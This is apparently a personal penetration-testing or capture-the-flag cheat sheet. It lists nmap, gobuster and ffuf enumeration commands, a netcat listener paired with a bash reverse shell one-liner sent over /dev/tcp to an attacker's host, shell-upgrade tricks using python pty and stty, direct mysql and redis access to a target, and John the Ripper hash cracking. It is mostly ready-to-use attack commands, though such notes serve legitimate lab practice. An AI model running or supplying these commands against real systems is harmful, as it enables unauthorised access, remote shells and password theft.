Contains handy commands and code snippets for use...
# Add -p- for all 65535 ports
sudo nmap -sS -sV -sC -oA nmap/<filename> $IP
gobuster dir -u http://$IP/ -o gobust.out -w {wordlist}
gobuster vhost -w ../SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://$DOMAIN
./ffuf -w ../SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://$IP/ -H 'Host: FUZZ.$DOMAIN' -ms 0
CRTL + U
- See revshells in tools.md
# in seperate terminals
nc -nvlp 9999
bash -c "bash -i >& /dev/tcp/<host ip>/<host port> 0>&1"
# examples below to run on target
python -c "import pty; pty.spawn('/bin/bash')"
python3 -c 'import pty;pty.spawn("/bin/bash")'
ruby -e "exec '/bin/bash'"
perl -e "exec '/bin/bash'"
# now ctrl+z it
# back on host machine run
stty raw -echo && fg
# enter, enter, now you're back in the shell, last step below to be able to ctrl+c, clear etc.
export TERM=xterm
mysql -h $IP -u $USER
redis-cli -h $IP
info keyspace
get <key>
./john --single <hash file in format user:hash>.txt